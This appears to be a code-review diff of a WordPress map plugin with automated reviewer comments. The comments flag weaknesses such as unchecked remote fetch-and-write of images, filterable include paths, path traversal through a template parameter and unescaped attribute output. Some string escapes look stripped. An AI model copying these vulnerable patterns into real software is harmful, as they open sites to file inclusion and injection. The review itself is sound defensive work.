-		function wpgmm_migrate_routes(){
-
-			//Migrate Routes
-			if( class_exists( 'WPGMP_Model_Route' ) ){
-
-				$routeObj = new WPGMP_Model_Route();
-
-				if(!empty($this->routes_data)) {
-					foreach($this->routes_data as $route){
-
-						$route = (array)$route;
-						$route['route_way_points'] = maybe_unserialize($route['route_way_points']);
-						$route['route_way_points'] = implode(',',$route['route_way_points']);
-						$route['_wpnonce'] = $_POST['_wpnonce'];
-						if(!empty($route['route_start_location'])){
-							$route['route_start_location'] = $this->mapping_data['old_and_new_location'][$route['route_start_location']];
-						}
-						if(!empty($route['route_end_location'])) {
-							$route['route_end_location'] = $this->mapping_data['old_and_new_location'][$route['route_end_location']];
-						}
-
-						if(!empty($route['route_way_points'])) {
-
-							$new_assigned_locations = array();
-							$route['route_way_points'] = explode(',',$route['route_way_points']);
-							foreach($route['route_way_points'] as $old_id){
-								$new_assigned_locations[] = $this->mapping_data['old_and_new_location'][$old_id];
-							}
-							$route['route_way_points'] = implode(',',$new_assigned_locations);
-
-						}
-						$_POST = $route;
-						$response = $routeObj->save();
-						$this->mapping_data['old_and_new_routes'][$route['route_id']] = $response['last_db_id'];
-
-					}
-				}
-
-			}
-
-
-		}
-
-		function wpgmm_migrate_maps(){
-
-			//Migrate Maps
-			if( class_exists( 'WPGMP_Model_Map' ) ){
-
-				$mapObj = new WPGMP_Model_Map();
-
-				if(!empty($this->map_data)) {
-
-					$map = 	$this->map_data;
-					$map = (array)$map;
-					$map['map_street_view_setting'] = maybe_unserialize($map['map_street_view_setting']);
-					$map['map_route_direction_setting'] = maybe_unserialize($map['map_route_direction_setting']);
-					$map['map_all_control'] = maybe_unserialize($map['map_all_control']);
-					$map['style_google_map'] = maybe_unserialize($map['style_google_map']);
-					$map['map_locations'] = maybe_unserialize($map['map_locations']);
-					$map['map_layer_setting'] = maybe_unserialize($map['map_layer_setting']);
-					$map['map_cluster_setting'] = maybe_unserialize($map['map_cluster_setting']);
-					$map['map_overlay_setting'] = maybe_unserialize($map['map_overlay_setting']);
-					$map['map_geotags'] = maybe_unserialize($map['map_geotags']);
-					$map['_wpnonce'] = $_POST['_wpnonce'];
-
-					$new_map_locations = array();
-					if(!empty($map['map_locations'])){
-						foreach($map['map_locations'] as $old_map_id){
-							$new_map_locations[] = $this->mapping_data['old_and_new_location'][$old_map_id];
-						}
-						$map['map_locations'] = $new_map_locations;
-					}
-
-					$new_map_routes = array();
-					if(!empty($map['map_route_direction_setting']['specific_routes'])) {
-						foreach($map['map_route_direction_setting']['specific_routes'] as $old_id){
-							$new_map_routes[] = $this->mapping_data['old_and_new_routes'][$old_id];
-						}
-					}
-					$map['map_route_direction_setting']['specific_routes'] = $new_map_routes;
-					$_POST = $map;
-					$mapObj->save();
-
-
-				}
-
-			}
-
-		}
-
-		function wpgmm_migrate_images(){
-
-			//Migrate Images
-			$uploads = wp_upload_dir();
-			if( $this->allow_url_fopen ) {
-
-				$this->files_to_migrate = array_filter($this->files_to_migrate);
-
-				if(isset($this->files_to_migrate) && !empty($this->files_to_migrate)) {
-					foreach($this->files_to_migrate as $url){
-
-						$imageinfo = explode('/',$url);
-						$month = $imageinfo[count($imageinfo)-2];
-						$year = $imageinfo[count($imageinfo)-3];
-						$upload_path = $uploads['basedir'].'/'.$year.'/'.$month.'/'.end($imageinfo);
-
-						if( !is_dir($uploads['basedir'].'/'.$year.'/'.$month) )   {
-							wp_mkdir_p( $uploads['basedir'].'/'.$year.'/'.$month );
-						}
-						if( is_dir($uploads['basedir'].'/'.$year.'/'.$month) ){
-
-							if ( file_exists( $uploads['basedir'].'/'.$year.'/'.$month.'/'.basename($url) ) ) {
-								continue;
-							}else{
-
-								$file_content = file_get_contents($url);
-								file_put_contents( $upload_path, $file_content );
-								$this->migratedImages++;
-
-							}
-
-						}
-
-					}
-				}
-			}
-		}
-
-		function wpgmm_get_complete_data(){
-
-			$wpgmp_settings = get_option( 'wpgmp_settings', true );
-			$wpgmp_location_extrafields = get_option( 'wpgmp_location_extrafields', true );
-			$wpgmp_widget_settings = get_option( 'widget_wpgmp_google_map_widget_class', true );
-			$modelFactory = new WPGMP_Model();
-
-			$location_obj = $modelFactory->create_object( 'location' );
-			$all_location_data = $location_obj->fetch();
-			if(!empty($all_location_data)) {
-				$this->wpgmp_data['location'] = $all_location_data;
-			}
-
-			$category_obj = $modelFactory->create_object( 'group_map' );
-			$categories   = $category_obj->fetch();
-			if(!empty($categories)) {
-				$this->wpgmp_data['group_map'] = $categories;
-			}
-
-			$route_obj = $modelFactory->create_object( 'route' );
-			$routes   = $route_obj->fetch();
-			if(!empty($routes)) {
-				$this->wpgmp_data['route'] = $routes;
-			}
-
-			$map_obj = $modelFactory->create_object( 'map' );
-			$maps   = $map_obj->fetch();
-			if(!empty($maps)) {
-				$this->wpgmp_data['map'] = $maps;
-			}
-
-			if(!empty($wpgmp_settings)) {
-				$this->wpgmp_data['settings'] = maybe_unserialize($wpgmp_settings);
-			}
-
-			if(!empty($wpgmp_location_extrafields)) {
-				$this->wpgmp_data['location_extrafields'] = maybe_unserialize($wpgmp_location_extrafields);
-			}
-
-			if(!empty($wpgmp_widget_settings)) {
-				$this->wpgmp_data['wpgmp_widget_settings'] = maybe_unserialize($wpgmp_widget_settings);
-			}
-
-			if(!empty($this->wpgmp_data)) {
-				$this->wpgmp_data['extra_data']['source_website'] = home_url();
-			}
-
-			if(is_multisite()){
-				$this->wpgmp_data['is_multisite'] = true;
-				$this->wpgmp_data['source_site_id'] = get_current_blog_id();
-			}
-
-			if(!empty($this->wpgmp_data))
-			$this->wpgmp_data = base64_encode( serialize( $this->wpgmp_data ) );
-			else
-			$this->wpgmp_data = '';
-
-		}
-
-		function wpgmm_settings_page() {
-
-			global $wpdb;
-			$modelFactory = new WPGMP_Model();
-			$mapobj       = $modelFactory->create_object( 'map' );
-			$map_records  = $mapobj->fetch();
-
-			//Permission Authentication
-			if ( ! current_user_can( 'manage_options' ) ) {
-				die( 'You are not allowed to make changes' );
-			}
-
-			$form = new WPGMP_Template();
-
-			$form->set_header( esc_html__( 'Import Maps Easily', 'wp-google-map-plugin' ), $this->response, $accordion = true );
-
-			$form->add_element(
-                'group', 'migration_settings', array(
-                'value'  => esc_html__( 'Import Live Demos', 'wp-google-map-plugin' ),
-                'before' => '<div class="fc-12">',
-                'after' => '</div>',
-				'tutorial_link' > 'https://www.wpmapspro.com/docs/how-to-export-a-live-demo-and-import-it-to-your-website/' ,
-				"pro" => true
-            ));
-
-			$form->form_id = 'wpgmp_complete_migration_form';
-
-
-			$form->add_element(
-			'file', 'wpgmp_map_import_control', array(
-				'label'         => esc_html__( 'Upload Map Code File', 'wp-google-map-plugin' ),
-				'default_value' => 'true',
-				'value'	=> 	'true',
-				'desc'  => esc_html__( 'Please upload the map code file that you have downloaded from wpmapspro.com website's live demo page.', 'wp-google-map-plugin' ),
-				'class'         => 'file_input form-control wpgmp_data_migration_option_import_wpgmp_process wpgmp_data_migration_option',
-				'id'            => 'wpgmp_map_import_control'
-				)
-			);
-
-			$form->add_element(
-				'submit', 'wpgmp_do_map_migration', array( 'value' => esc_html__( 'Import Map', 'wp-google-map-plugin' ),'pro' => true )
-			);
-
-			if(isset($_GET['devmode']) && $_GET['devmode'] == 'yes'){
-
-				$form->add_element(
-					'submit', 'wpgmp_do_images_migration', array( 'value' => esc_html__( 'Migrate Images Again', 'wp-google-map-plugin' ) )
-				);
-
-		 	}
-
-			$form->render();
-
-		}
-
-
-		function wpgmm_migrate_map_settings() {
-
-			$style_editor = add_submenu_page(
-				'wpgmp_view_overview',
-				esc_html__( 'Import Maps','wp-google-map-plugin' ),
-				esc_html__( 'Import Maps','wp-google-map-plugin' ),
-				'manage_options',
-				'wpgmp_map_import',
-				array($this,'wpgmm_settings_page')
-			);
-
-			add_action( 'load-'.$style_editor, array($this,'wpgmm_required_resources' ) );
-
-		}
-
-		function wpgmm_required_resources(){
-
-			if(class_exists('WPGMP_Helper')) {
-
-				WPGMP_Helper::wpgmp_register_map_backend_resources();
-			}
-
-		}
-
-		function wpgmm_action_head(){ ?>
-			<style>.wp-google-map-pro_page_wpgmp_complete_migration input[name="wpgmp_complete_json_download"]{display:none;}</style>
-		<?php }
-
-
-
-		function wpgmm_handle_custom() {
-		?>
-		<script>
-			jQuery(document).ready(function($) {
-
-			  $('.wpgmp_import_export_switch').change(function(){
-				var value = $( 'input[name=wpgmp_import_export_switch]:checked' ).val();
-				if(value == 'export_wpgmp_process'){
-					$('input[name="wpgmp_do_map_migration"]').hide();
-					$('input[name="wpgmp_complete_json_download"]').show();
-					$('.wpgmm_upload_control').hide();
-				}else{
-					$('input[name="wpgmp_complete_json_download"]').hide();
-					$('input[name="wpgmp_do_map_migration"]').show();
-					$('.wpgmm_upload_control').show();
-				}
-			  });
-			  $('#wpgmp_map_import_control').closest('.fc-form-group ').addClass('wpgmm_upload_control');
-
-			});
-
-		</script>
-		<?php
-
-		}
-
-
-
-
-	}
-
-	return new WPGMP_Maps_Importer();
-
-}
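Review bot: The removed wpgmm_migrate_images() built its destination path from URL segments ($year, $month, end($imageinfo)) and filled it with file_get_contents($url), with no extension or containment check, so deleting this class removes a remote-fetch-and-write path. What still needs confirming is that nothing else requires this file, since it ended in return new WPGMP_Maps_Importer() and registered the wpgmp_map_import submenu. The removed code also overwrote the superglobal wholesale ($_POST = $route; and $_POST = $map;) before calling save(), so any replacement importer should pass the data as arguments instead.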
--- a/wp-google-map-plugin/classes/wpgmp-model.php
+++ b/wp-google-map-plugin/classes/wpgmp-model.php
@@ -24,7 +24,8 @@

 			$page = isset($_GET['page']) && !empty($_GET['page']) ? $_GET['page'] : '';
 			$module_path = WPGMP_MODEL;
-			$module_path = apply_filters('fc_modal_load_module', $module_path, $page);
+			$module_path = apply_filters('fc_modal_load_module', $module_path, $page); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
+
 			parent::__construct( $module_path, 'WPGMP_Model_' );

 		}
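Review bot: $page is read from $_GET['page'] without sanitizing and handed to the fc_modal_load_module filter, whose return value becomes the module path passed to parent::__construct(); the change only adds a phpcs:ignore for the hook name. Suggest $page = isset( $_GET['page'] ) ? sanitize_key( wp_unslash( $_GET['page'] ) ) : ''; so filter callbacks never see raw request input when choosing a path.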
--- a/wp-google-map-plugin/classes/wpgmp-visual-composer.php
+++ b/wp-google-map-plugin/classes/wpgmp-visual-composer.php
@@ -1,46 +0,0 @@
-<?php
-
-class WPGMP_VC_Builder{
-
-	public function __construct() {	}
-
-	public function wpgmp_register_vc_component(){
-
-		global $wpdb;
-
-		$map_options = array();
-
-		$map_options[ esc_html__( 'Select Map', 'wp-google-map-plugin' ) ] = '';
-		$map_records = $wpdb->get_results( 'SELECT map_id,map_title FROM ' . TBL_MAP . '' );
-
-		if ( ! empty( $map_records ) ) {
-			foreach ( $map_records as $key => $map_record ) {
-				$map_options[ $map_record->map_title ] = $map_record->map_id;
-			}
-		}
-
-		$shortcodeParams = array();
-
-		$shortcodeParams[] = array(
-			'type'        => 'dropdown',
-			'heading'     => esc_html__( 'Choose Maps', 'wp-google-map-plugin' ),
-			'param_name'  => 'id',
-			'description' => esc_html__( 'Choose here the map you want to show.', 'wp-google-map-plugin' ),
-			'value'       => $map_options,
-		);
-
-		$wpgmp_maps_component = array(
-			'name'        => esc_html__( 'WP Maps Pro', 'wp-google-map-plugin' ),
-			'base'        => 'put_wpgm',
-			'class'       => '',
-			'category'    => esc_html__( 'Content', 'wp-google-map-plugin' ),
-			'description' => esc_html__( 'Google Maps', 'wp-google-map-plugin' ),
-			'params'      => $shortcodeParams,
-			'icon'        => WPGMP_IMAGES . 'flippercode.png',
-		);
-		vc_map( $wpgmp_maps_component );
-
-	}
-
-
-}
 No newline at end of file
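Review bot: Deleting WPGMP_VC_Builder leaves any remaining hook that calls wpgmp_register_vc_component() pointing at a missing class; the hook registration is not in this hunk, so confirm it is removed in the same change. No concern about the deletion itself: the query it ran concatenated only the TBL_MAP constant.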
--- a/wp-google-map-plugin/core/class.controller.php
+++ b/wp-google-map-plugin/core/class.controller.php
@@ -89,7 +89,8 @@
 		 */
 		public function display( $view, $options = array() ) {

-			$this->entity = apply_filters( 'fc_plugin_module_to_load', $this->entity );
+			$this->entity = apply_filters( 'fc_plugin_module_to_load', $this->entity ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
+
 			if ( isset( $this->pluginInstance ) && $this->pluginInstance->needs_license_verification() ) {
 				if ( $this->entity == 'debug' ) {
 					$view = 'form';
@@ -103,7 +104,8 @@
 					$view = $view . '.php';
 			}

-			$this->modulePath = apply_filters('fc_backend_module_path', $this->modulePath,$this->entity, $view );
+			$this->modulePath = apply_filters('fc_backend_module_path', $this->modulePath,$this->entity, $view ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
+

 			if ( ! empty( $view ) ) {
 				if ( file_exists( $this->modulePath . "{$this->entity}/views/" . $view ) ) {
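Review bot: At the fc_backend_module_path line, $this->modulePath, $this->entity and $view are filterable or caller-supplied and are then joined into one path with only file_exists() as a gate; this hunk adds a lint suppression but no containment check. If the matched view file is included further down (not visible here), resolve it with realpath() and verify it still sits under the plugin's module directory before loading it.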
--- a/wp-google-map-plugin/core/class.importer.php
+++ b/wp-google-map-plugin/core/class.importer.php
@@ -1,4 +1,5 @@
 <?php
+/* phpcs:disable WordPress.WP.AlternativeFunctions */
 /**
  *  Export-Import Records in csv,xml,json and excel
  *
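Review bot: The new first line, /* phpcs:disable WordPress.WP.AlternativeFunctions */, switches the whole sniff off for the entire file and carries no justification, which makes the narrower, documented disables added inside export() redundant and hides any later fopen() or file_get_contents() use elsewhere in the class. Prefer dropping the file-level disable and keeping only the scoped ones around the direct-output code.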
@@ -50,6 +51,10 @@
 		 */
 		function export( $action, $asFilename ) {

+			/* phpcs:disable WordPress.Security.EscapeOutput.OutputNotEscaped -- Plain-text download; fputcsv() handles quoting. */
+			/* phpcs:disable WordPress.WP.AlternativeFunctions.file_system_read_fopen -- Direct output to browser is intended. */
+			/* phpcs:disable WordPress.WP.AlternativeFunctions.file_system_read_fwrite -- Direct output to browser is intended. */
+
 			if ( 'csv' == $action ) {

 				header( 'Content-Type: text/csv' );
@@ -64,18 +69,20 @@
 						fputcsv( $fp, array_values( $result ), ',', '"' );
 					}
 				}
-
-				fclose( $fp );
+
+				fclose( $fp );/* phpcs:disable WordPress.WP.AlternativeFunctions.file_system_read_fclose -- Direct output to browser is intended. */

 			} elseif ( 'excel' == $action ) {
 				header( 'Content-Type: application/xls' );
 				header( 'Content-Disposition: attachment; filename="' . $asFilename . '.xls"' );
 				if ( ! empty( $this->data ) ) {
 					$separator = "t";
+
 					echo implode( $separator, $this->columns ) . "n";
 					foreach ( $this->data as $key => $result ) {
 						echo implode( $separator, $result ) . "n";
 					}
+
 				}
 			} elseif ( 'json' == $action ) {
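Review bot: The fclose( $fp ); line carries a trailing /* phpcs:disable ... file_system_read_fclose */, which turns the check off from that point onward rather than for that one statement; phpcs:ignore is the form that fits a trailing comment. Separately, the justification given for suppressing EscapeOutput is that fputcsv() handles quoting, but the excel branch in this hunk writes rows with echo implode( $separator, $result ), so cell values there are neither quoted nor escaped, and $asFilename goes into the Content-Disposition header as is.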

@@ -93,6 +100,7 @@
 				fwrite( $fp, $json_pretty_data );
 				fclose( $fp );
 			}
+			/* phpcs:enable WordPress.Security.EscapeOutput.OutputNotEscaped */
 		}
 		/**
 		 * Convert xml node to array.
@@ -178,3 +186,6 @@
 		}
 	}
 }
+// phpcs:enable WordPress.WP.AlternativeFunctions.file_system_read_fopen
+// phpcs:enable WordPress.WP.AlternativeFunctions.file_system_read_fwrite
+// phpcs:enable WordPress.WP.AlternativeFunctions.file_system_read_fclose
--- a/wp-google-map-plugin/core/class.initiate-core.php
+++ b/wp-google-map-plugin/core/class.initiate-core.php
@@ -36,12 +36,15 @@
 			$core_dir_url  = plugin_dir_url( dirname( __FILE__ ) );


-			$core_dir_path = apply_filters( 'fc_template_plugin_core_dir_path', $core_dir_path, $data );
-			$core_dir_url = apply_filters( 'fc_template_plugin_core_dir_url', $core_dir_url, $data );
-			$data = apply_filters( 'fc_template_plugin_ajax_post_data', $data, $core_dir_path );
+			$core_dir_path = apply_filters( 'fc_template_plugin_core_dir_path', $core_dir_path, $data ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound

-			$template      = $data['template_name'];
-			$template_type = $data['template_type'];
+			$core_dir_url = apply_filters( 'fc_template_plugin_core_dir_url', $core_dir_url, $data ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
+
+			$data = apply_filters( 'fc_template_plugin_ajax_post_data', $data, $core_dir_path ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
+
+
+			$template      = sanitize_file_name($data['template_name']);
+			$template_type = sanitize_text_field($data['template_type']);

 			if ( isset( $data['template_name'] ) ) {
 				$layout_file = $core_dir_path . 'templates/' . $template_type . '/' . $template . '/' . $template . '.html';
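Review bot: sanitize_text_field() on $data['template_type'] does not remove dots or slashes, and $template_type is still concatenated into $layout_file as a directory component, so only $template is actually confined by sanitize_file_name(). Restrict $template_type to the template types the plugin ships (an allowlist, or at least sanitize_key()), and after building $layout_file compare realpath( $layout_file ) against realpath( $core_dir_path . 'templates/' ) before the file is read. Both array reads also now run before the isset( $data['template_name'] ) check on the next line, so a request without those keys raises notices; move the sanitizing inside the isset branch.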
@@ -60,7 +63,8 @@
 				$response['html'] = '<div id="messages" class="error">Sorry layout ' . $layout_id . ' not found.</div>';
 			} else {
 				$temp_content = $content;
-				$content      = "<div class='fc-infobox-". $template . " fc-" . $template_type . '-' . $template . "'>" . apply_filters( 'fc-dummy-placeholders', $content ) . '</div>';
+				$content      = "<div class='fc-infobox-". $template . " fc-" . $template_type . '-' . $template . "'>" . apply_filters( 'fc-dummy-placeholders', $content ) . '</div>'; // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
+
 				$columns      = isset($data['columns']) ? $data['columns'] : '';
 				if ( $columns == '' ) {
 					$columns = 1;}
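Review bot: $template and $template_type are placed inside the single-quoted class attribute of the wrapper div without esc_attr(); sanitize_text_field() leaves quote characters in $template_type, so the value is not safe for an attribute context. Wrap both in esc_attr() (or sanitize_html_class()) here; the added phpcs:ignore covers only the hook name and does not address the output.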
@@ -188,15 +192,13 @@
 				'class.notifications.php',
 				'class.tabular.php',
 				'class.template.php',
-				'abstract.factory.php',
 				'class.controller-factory.php',
 				'class.model-factory.php',
 				'class.controller.php',
 				'class.model.php',
 				'class.validation.php',
 				'class.database.php',
-				'class.importer.php',
-				'class.plugin-overview.php',
+				'class.importer.php'
 			);

 			/**
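Review bot: 'abstract.factory.php' is dropped from the load list while 'class.controller-factory.php' and 'class.model-factory.php' stay; if either factory class extends or references the abstract class, the first request will fatal, so confirm that dependency was removed too. The last entry, 'class.importer.php', also loses its trailing comma, which makes the next addition to the list a two-line diff.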
--- a/wp-google-map-plugin/core/class.model-factory.php
+++ b/wp-google-map-plugin/core/class.model-factory.php
@@ -35,7 +35,8 @@
 		public function create_object( $objectType ) {

 			$file = $this->modulePath . $objectType . '/model.' . $objectType . '.php';
-			$file = apply_filters('fc_backend_factory_object_path', $file, $this->modulePath, $objectType);
+			$file = apply_filters('fc_backend_factory_object_path', $file, $this->modulePath, $objectType); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
+

 			if ( file_exists( $file ) ) {
 				require_once $file;
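Review bot: $objectType is concatenated twice into $file, the result is passed through the fc_backend_factory_object_path filter, and whatever comes back is loaded with require_once behind nothing more than file_exists(). Validate $objectType with sanitize_key() or an allowlist of module names before building the path, and check that the filtered $file still resolves under $this->modulePath before requiring it.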
--- a/wp-google-map-plugin/core/class.model.php
+++ b/wp-google-map-plugin/core/class.model.php
@@ -300,7 +300,8 @@
 		protected function throw_errors() {

 			if ( isset( $this->errors ) and is_array( $this->errors ) ) {
-
+
+				// phpcs:ignore WordPress.Security.EscapeOutput.ExceptionNotEscaped -- Internal error messages for display
 				throw new Exception( implode( '<br>', $this->errors ) );

 			}
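Review bot: The suppression comment says the message is for display, and the message is built with implode( '<br>', $this->errors ), so HTML is expected to be rendered by whoever catches this exception. That pushes escaping to every catch site; either escape each entry with esc_html() before the implode here, or document that callers must pass getMessage() through wp_kses() with only br allowed.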
--- a/wp-google-map-plugin/core/class.notifications.php
+++ b/wp-google-map-plugin/core/class.notifications.php
@@ -45,6 +45,7 @@
 						<i class="wep-icon-plug wep-icon-2x"></i>
 					</div>
 					<div>' . sprintf(
+						  /* translators: %s: Plugin Name. */
 						esc_html__(
 							'This plugin now supports OpenStreetMap. Visit the %s to try it out!',
 							'wp-google-map-plugin'
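Review bot: The translators comment describes %s as the plugin name, but the string reads 'Visit the %s to try it out!', where the placeholder is evidently a page or link label. Reword the comment to match what is actually substituted, and align its indentation with the esc_html__( line below it.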
--- a/wp-google-map-plugin/core/class.plugin-overview.php
+++ b/wp-google-map-plugin/core/class.plugin-overview.php
@@ -1,583 +0,0 @@
-<?php
-
-/**
- * Flippercode Product Overview Setup Class
- *
- * @author Flipper Code<hello@flippercode.com>
- * @version 2.0.0
- * @package Core
- */
-
-
-if ( ! class_exists( 'Flippercode_Product_Overview' ) ) {
-/**
-
-
- * FlipperCode Overview Setup Class.
- *
- * @author Flipper Code<hello@flippercode.com>
- *
- * @version 2.0.0
- *
- * @package Core
- */
-
-
-	class Flippercode_Product_Overview {
-
-
-		public $PO;
-
-
-		public $productOverview;
-
-
-		public $productName;
-
-
-		public $productSlug;
-
-
-		public $productTextDomain;
-
-
-		public $productIconImage;
-
-
-		public $productVersion;
-
-
-		private $commonBlocks;
-
-
-		private $productSpecificBlocks;
-
-
-		private $is_common_block;
-
-
-		private $productBlocksRendered = 0;
-
-
-		private $blockHeading;
-
-
-		private $blockContent;
-
-
-		private $blockClass = '';
-
-
-		private $commonBlockMarkup = '';
-
-
-		private $pluginSpecificBlockMarkup = '';
-
-
-		private $finalproductOverviewMarkup = '';
-
-
-		private $allProductsInfo = array();
-
-
-		private $message = '';
-
-		private $productID;
-
-		private $videoURL;
-
-		private $error;
-
-
-		private $docURL;
-
-
-		private $demoURL;
-
-
-		private $productImagePath;
-
-
-		private $isUpdateAvailable;
-
-
-		private $multisiteLicence;
-
-
-		private $productSaleURL;
-
-		private $pluginProperty;
-
-
-		private $getting_started_link;
-
-
-		function __construct( $pluginInfo ) {
-
-
-			$this->commonBlocks = array( 'product-activation', 'newsletter', 'links-block', 'extended-support', 'create_support_ticket', 'hire_wp_expert' );
-
-			if ( isset( $pluginInfo['excludeBlocks'] ) ) {
-				$this->commonBlocks = array_diff( $this->commonBlocks, $pluginInfo['excludeBlocks'] );
-			}
-
-
-			$this->init( $pluginInfo );
-			$this->renderOverviewPage();
-
-
-		}
-
-
-		function renderOverviewPage() {	?>
-
-
-			<div class="flippercode-ui fcdoc-product-info" data-current-product=<?php echo esc_attr($this->productTextDomain); ?> data-current-product-slug=<?php echo esc_attr($this->productSlug); ?> data-product-version = <?php echo esc_attr($this->productVersion) ; ?> data-product-name = "<?php echo esc_attr($this->productName); ?>" >
-
-			<div class="fc-root">
-				<div class="fc-root-inner">
-				<?php echo WePlugins_Notification::weplugins_display_notification();?>
-				<div class="fc-header">
-						<div class="fc-header-primary">
-							<div class="fc-container">
-								<div class="fc-product-wrapper">
-									<div class="fc-product-icon">
-										<img src="<?php echo plugin_dir_url( __DIR__ ) . 'assets/images/icon-folder.svg' ?>" alt="Icon Folder">
-									</div>
-									<div class="fc-product-name"><?php esc_html_e( $this->productName ) ?></div>
-									<div class="fc-product-version"><?php esc_html_e( $this->productVersion ) ?></div>
-								</div>
-
-								<div class="fc-header-toolbar">
-									<div class="fc-action-menu">
-										<div class="fc-action-menu-item">
-											<a href="https://www.wpmapspro.com/tutorials" target="_blank" class="fc-btn fc-btn-icon">
-												<i class="wep-icon-note"></i>
-											</a>
-										</div>
-										<div class="fc-action-menu-item">
-											<a href="https://www.youtube.com/playlist?list=PLlCp-8jiD3p1mzGUmrEgjNP1zdamrJ6uI" target="_blank" class="fc-btn fc-btn-icon">
-												<i class="wep-icon-video"></i>
-											</a>
-										</div>
-										<div class="fc-action-menu-item">
-											<a href="https://weplugins.com/support" target="_blank" class="fc-btn fc-btn-icon">
-												<i class="wep-icon-chat"></i>
-											</a>
-										</div>
-										<div class="fc-action-menu-item">
-											<div class="fc-brand">
-												<a href="https://weplugins.com" target="_blank">
-													<img src="<?php  echo plugin_dir_url( __DIR__ ) . 'assets/images/logo.svg' ?>" alt="logo" class="fc-brand-img">
-												</a>
-											</div>
-										</div>
-									</div>
-								</div>
-							</div>
-						</div>
-						<?php echo apply_filters('fc_plugin_nav_menu',''); ?>
-
-					</div>
-			<div class="fc-main">
-			<div class="fc-container">
-
-
-				 <div class="fc-divider"><div class="fc-12"><div class="fc-divider">
-
-
-					  <div class="fcdoc-flexrow fc-row">
-
-
-						<?php $this->renderBlocks(); ?>
-
-
-					  </div>
-
-				 </div></div></div>
-
-
-			 </div>
-
-
-			</div>
-
-			</div>
-			</div>
-
-			<?php
-
-
-
-		}
-
-
-		function setup_plugin_info( $pluginInfo ) {
-
-
-			foreach ( $pluginInfo as $pluginProperty => $value ) {
-
-
-				$this->$pluginProperty = $value;
-
-
-			}
-
-
-		}
-
-
-		function get_mailchimp_integration_form() {
-
-
-			$form = '';
-
-
-			$form .= '<!-- Begin MailChimp Signup Form -->
-
-
-
-<link href="//cdn-images.mailchimp.com/embedcode/slim-10_7.css" rel="stylesheet" type="text/css">
-<style type="text/css">
-	#mc_embed_signup{background:#fff; clear:left; font:14px Helvetica,Arial,sans-serif; }
-</style>
-<div id="mc_embed_signup">
-<form action="//flippercode.us10.list-manage.com/subscribe/post?u=eb646b3b0ffcb4c371ea0de1a&id=3ee1d0075d" method="post" id="mc-embedded-subscribe-form" name="mc-embedded-subscribe-form" class="validate" target="_blank" novalidate>
-    <div id="mc_embed_signup_scroll">
-	<label for="mce-EMAIL">' . $this->PO['subscribe_mailing_list'] . '</label>
-	<input type="email"  name="EMAIL" value="' . get_bloginfo( 'admin_email' ) . '" class="email" id="mce-EMAIL" placeholder="email address" required>
-    <!-- real people should not fill this in and expect good things - do not remove this or risk form bot signups-->
-    <div style="position: absolute; left: -5000px;" aria-hidden="true"><input type="text" name="b_eb646b3b0ffcb4c371ea0de1a_3ee1d0075d" tabindex="-1" value=""></div>
-
-
-    <div class="clear"><input type="submit" value="Subscribe" name="subscribe" id="mc-embedded-subscribe" class="fc-btn fc-btn-default"></div>
-
-
-    </div>
-</form>
-</div>
-<!--End mc_embed_signup-->';
-
-
-			 return $form;
-
-
-		}
-
-
-
-		function init( $pluginInfo ) {
-
-
-
-			$this->setup_plugin_info( $pluginInfo );
-
-
-			$this->PO = $this->productOverview;
-
-			$debug_array = array();
-
-			if ( isset( $this->PO['debug_array'] ) && ! empty( $this->PO['debug_array'] ) ) {
-				$debug_array = $this->PO['debug_array'];
-			}
-
-
-			foreach ( $this->commonBlocks as $block ) {
-
-
-				switch ( $block ) {
-
-
-					case 'product-activation':
-						$this->blockHeading = '<h1>' . ( (!empty($this->PO['product_info_heading']) ) ? $this->PO['product_info_heading'] : $this->PO['get_started_heading'] ) . '</h1>';
-
-						$this->blockContent .= '<div class="fc-divider fcdoc-brow fc-row">
-
-	                       	<div class="fc-3 fc-text-center"><img src="' . plugin_dir_url( __DIR__ ) . 'assets/images/folder-logo.png"></div>
-
-	                       	<div class="fc-9">
-	                       	<h3>' . $pluginInfo['productName'] . '</h3>
-							<span class="fcdoc-span">' . $this->PO['installed_version'] . ' <strong>' . $this->productVersion . '</strong></span>';
-
-						if ( !empty( $debug_array ) ) {
-
-							if ( array_key_exists( 'envato_response', $debug_array ) ) {
-
-								$summary             = $debug_array['envato_response']['summary'];
-								$this->blockContent .= '</div><div class="fc-12">
-
-								<table style="width:100%" class="fc-table fc-table-layout3 purchase_verification_info">
-	                       	 		<tr>
-									    <td style="width:25%;">' . $this->PO['product_support']['envato_purchase_date'] . '</td>
-									    <td>' . date( 'Y M, d', strtotime( $summary['sold_at'] ) ) . '</td>
-									</tr>
-									<tr>
-									   	<td>' . $this->PO['product_support']['envato_license_type'] . '</td>
-									    <td>' . $summary['license'] . '</td>
-									</tr>
-									<tr>
-									    <td>' . $this->PO['product_support']['envato_support_until'] . '</td>
-									    <td>' . date( 'Y M, d', strtotime( $summary['supported_until'] ) ) . '</td>
-									</tr>
-								</table>
-								<strong><a href="' . $this->PO['getting_started_link'] . '" target="_blank" class="fc-btn fc-btn-default get_started_link">' . $this->PO['get_started_btn_text'] . '</a></strong>';
-
-							}
-						} else {
-
-							$this->blockContent .= '<p>' . $this->PO['product_info_desc'] . '</p><strong>
-							<a href="' . $this->PO['getting_started_link'] . '" target="_blank" class="fc-btn fc-btn-default get_started_link">' . $this->PO['get_started_btn_text'] . '</a></strong>';
-
-						}
-
-						$this->blockContent .= "</div></div>";
-
-						break;
-
-
-
-
-					case 'newsletter':
-
-
-						$this->blockHeading = '<h1>' . $this->PO['subscribe_now']['heading'] . '</h1>';
-
-
-						$this->blockContent = '<div class="fc-divider fcdoc-brow fc-row fc-items-center">
-
-
-	                       	<div class="fc-7 fc-items-center"><p>' . $this->PO['subscribe_now']['desc1'] . '<br>
-
-
-	                       	<strong>' . $this->PO['subscribe_now']['desc2'] . '	</strong></p>
-
-
-	                       	'.$this->get_mailchimp_integration_form().'
-
-
-	                         </div>
-
-
